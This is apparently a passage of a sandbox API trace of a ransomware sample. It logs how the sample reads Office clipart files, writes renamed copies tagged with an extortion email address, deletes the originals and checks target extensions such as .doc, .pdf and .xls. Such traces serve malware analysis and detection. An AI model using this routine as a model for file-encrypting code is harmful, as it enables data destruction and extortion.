	[0139.963] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0139.964] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.964] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0139.964] GetLastError () returned 0x0
	[0139.964] ReadFile (in: hFile=0x398, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x3f34, lpOverlapped=0x0) returned 1
	[0140.006] WriteFile (in: hFile=0x39c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x3f40, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x3f40, lpOverlapped=0x0) returned 1
	[0140.007] ReadFile (in: hFile=0x398, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.007] WriteFile (in: hFile=0x39c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.007] SetEndOfFile (hFile=0x39c) returned 1
	[0140.028] CloseHandle (hObject=0x39c) returned 1
	[0140.029] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.029] SetEndOfFile (hFile=0x398) returned 1
	[0140.097] CloseHandle (hObject=0x398) returned 1
	[0140.098] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.157] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf")) returned 1
	[0140.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63
	[0140.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63
	[0140.179] lstrlenW (lpString=".doc") returned 4
	[0140.179] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.179] lstrlenW (lpString=".docx") returned 5
	[0140.179] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.179] lstrlenW (lpString=".pdf") returned 4
	[0140.179] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.179] lstrlenW (lpString=".xls") returned 4
	[0140.179] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.179] lstrlenW (lpString=".xlsx") returned 5
	[0140.179] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.179] lstrlenW (lpString=".ppt") returned 4
	[0140.179] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63
	[0140.179] lstrlenW (lpString=".zip") returned 4
	[0140.179] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.179] lstrlenW (lpString=".rar") returned 4
	[0140.179] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.179] lstrlenW (lpString=".bz2") returned 4
	[0140.179] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.180] lstrlenW (lpString=".7z") returned 3
	[0140.180] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63
	[0140.180] lstrlenW (lpString=".dbf") returned 4
	[0140.180] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63
	[0140.180] lstrlenW (lpString=".1cd") returned 4
	[0140.180] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63
	[0140.180] lstrlenW (lpString=".jpg") returned 4
	[0140.180] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63
	[0140.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63
	[0140.180] lstrlenW (lpString=".doc") returned 4
	[0140.180] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.180] lstrlenW (lpString=".docx") returned 5
	[0140.180] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.180] lstrlenW (lpString=".pdf") returned 4
	[0140.180] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.180] lstrlenW (lpString=".xls") returned 4
	[0140.180] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.180] lstrlenW (lpString=".xlsx") returned 5
	[0140.180] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.180] lstrlenW (lpString=".ppt") returned 4
	[0140.180] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63
	[0140.180] lstrlenW (lpString=".zip") returned 4
	[0140.180] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.180] lstrlenW (lpString=".rar") returned 4
	[0140.180] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.180] lstrlenW (lpString=".bz2") returned 4
	[0140.180] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.180] lstrlenW (lpString=".7z") returned 3
	[0140.180] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63
	[0140.181] lstrlenW (lpString=".dbf") returned 4
	[0140.181] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63
	[0140.181] lstrlenW (lpString=".1cd") returned 4
	[0140.181] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 63
	[0140.181] lstrlenW (lpString=".jpg") returned 4
	[0140.181] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.181] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0140.181] lstrlenW (lpString="BD06102_.WMF") returned 12
	[0140.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0140.209] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=16112) returned 1
	[0140.209] CloseHandle (hObject=0x3b0) returned 1
	[0140.209] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf")) returned 0x20
	[0140.209] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0140.210] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.210] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0140.210] GetLastError () returned 0x0
	[0140.210] ReadFile (in: hFile=0x3b0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x3ef0, lpOverlapped=0x0) returned 1
	[0140.216] WriteFile (in: hFile=0x3b8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x3f00, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x3f00, lpOverlapped=0x0) returned 1
	[0140.217] ReadFile (in: hFile=0x3b0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.217] WriteFile (in: hFile=0x3b8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.217] SetEndOfFile (hFile=0x3b8) returned 1
	[0140.218] CloseHandle (hObject=0x3b8) returned 1
	[0140.218] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.218] SetEndOfFile (hFile=0x3b0) returned 1
	[0140.222] CloseHandle (hObject=0x3b0) returned 1
	[0140.222] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.222] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf")) returned 1
	[0140.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63
	[0140.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63
	[0140.223] lstrlenW (lpString=".doc") returned 4
	[0140.223] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.223] lstrlenW (lpString=".docx") returned 5
	[0140.223] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.223] lstrlenW (lpString=".pdf") returned 4
	[0140.223] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.223] lstrlenW (lpString=".xls") returned 4
	[0140.223] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.223] lstrlenW (lpString=".xlsx") returned 5
	[0140.223] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.223] lstrlenW (lpString=".ppt") returned 4
	[0140.223] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63
	[0140.223] lstrlenW (lpString=".zip") returned 4
	[0140.223] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.223] lstrlenW (lpString=".rar") returned 4
	[0140.223] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.223] lstrlenW (lpString=".bz2") returned 4
	[0140.223] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.223] lstrlenW (lpString=".7z") returned 3
	[0140.223] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63
	[0140.223] lstrlenW (lpString=".dbf") returned 4
	[0140.223] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63
	[0140.224] lstrlenW (lpString=".1cd") returned 4
	[0140.224] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63
	[0140.224] lstrlenW (lpString=".jpg") returned 4
	[0140.224] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63
	[0140.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63
	[0140.224] lstrlenW (lpString=".doc") returned 4
	[0140.224] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.224] lstrlenW (lpString=".docx") returned 5
	[0140.224] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.224] lstrlenW (lpString=".pdf") returned 4
	[0140.224] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.224] lstrlenW (lpString=".xls") returned 4
	[0140.224] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.224] lstrlenW (lpString=".xlsx") returned 5
	[0140.224] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.224] lstrlenW (lpString=".ppt") returned 4
	[0140.224] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63
	[0140.224] lstrlenW (lpString=".zip") returned 4
	[0140.224] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.224] lstrlenW (lpString=".rar") returned 4
	[0140.224] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.224] lstrlenW (lpString=".bz2") returned 4
	[0140.224] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.224] lstrlenW (lpString=".7z") returned 3
	[0140.224] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63
	[0140.224] lstrlenW (lpString=".dbf") returned 4
	[0140.224] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63
	[0140.224] lstrlenW (lpString=".1cd") returned 4
	[0140.224] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 63
	[0140.225] lstrlenW (lpString=".jpg") returned 4
	[0140.225] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.225] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0140.225] lstrlenW (lpString="BD06200_.WMF") returned 12
	[0140.225] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0140.228] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=16676) returned 1
	[0140.228] CloseHandle (hObject=0x398) returned 1
	[0140.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf")) returned 0x20
	[0140.228] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0140.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0140.228] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.228] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.228] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0140.229] GetLastError () returned 0x0
	[0140.229] ReadFile (in: hFile=0x398, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x4124, lpOverlapped=0x0) returned 1
	[0140.231] WriteFile (in: hFile=0x3bc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x4130, lpOverlapped=0x0) returned 1
	[0140.232] ReadFile (in: hFile=0x398, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0140.232] WriteFile (in: hFile=0x3bc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0140.232] SetEndOfFile (hFile=0x3bc) returned 1
	[0140.232] CloseHandle (hObject=0x3bc) returned 1
	[0140.232] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0140.232] SetEndOfFile (hFile=0x398) returned 1
	[0140.236] CloseHandle (hObject=0x398) returned 1
	[0140.236] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0140.236] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06200_.wmf")) returned 1
	[0140.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63
	[0140.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63
	[0140.237] lstrlenW (lpString=".doc") returned 4
	[0140.237] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.237] lstrlenW (lpString=".docx") returned 5
	[0140.237] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.237] lstrlenW (lpString=".pdf") returned 4
	[0140.237] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.237] lstrlenW (lpString=".xls") returned 4
	[0140.237] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.237] lstrlenW (lpString=".xlsx") returned 5
	[0140.237] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.237] lstrlenW (lpString=".ppt") returned 4
	[0140.237] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.237] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63
	[0140.237] lstrlenW (lpString=".zip") returned 4
	[0140.237] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.237] lstrlenW (lpString=".rar") returned 4
	[0140.237] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.237] lstrlenW (lpString=".bz2") returned 4
	[0140.237] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.237] lstrlenW (lpString=".7z") returned 3
	[0140.238] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63
	[0140.238] lstrlenW (lpString=".dbf") returned 4
	[0140.238] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63
	[0140.238] lstrlenW (lpString=".1cd") returned 4
	[0140.238] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63
	[0140.238] lstrlenW (lpString=".jpg") returned 4
	[0140.238] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63
	[0140.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63
	[0140.238] lstrlenW (lpString=".doc") returned 4
	[0140.238] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0140.238] lstrlenW (lpString=".docx") returned 5
	[0140.238] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0140.238] lstrlenW (lpString=".pdf") returned 4
	[0140.238] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0140.238] lstrlenW (lpString=".xls") returned 4
	[0140.238] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0140.238] lstrlenW (lpString=".xlsx") returned 5
	[0140.238] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0140.238] lstrlenW (lpString=".ppt") returned 4
	[0140.238] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0140.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63
	[0140.238] lstrlenW (lpString=".zip") returned 4
	[0140.238] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0140.238] lstrlenW (lpString=".rar") returned 4
	[0140.238] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0140.238] lstrlenW (lpString=".bz2") returned 4
	[0140.238] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0140.238] lstrlenW (lpString=".7z") returned 3
	[0140.238] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0140.238] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63
	[0140.238] lstrlenW (lpString=".dbf") returned 4
	[0140.239] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0140.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63
	[0140.239] lstrlenW (lpString=".1cd") returned 4
	[0140.239] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0140.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 63
	[0140.239] lstrlenW (lpString=".jpg") returned 4
	[0140.239] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0140.239] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0140.239] lstrlenW (lpString="BD07761_.WMF") returned 12
	[0140.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0140.239] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=26748) returned 1
	[0140.239] CloseHandle (hObject=0x398) returned 1
	[0140.239] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf")) returned 0x20
	[0140.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
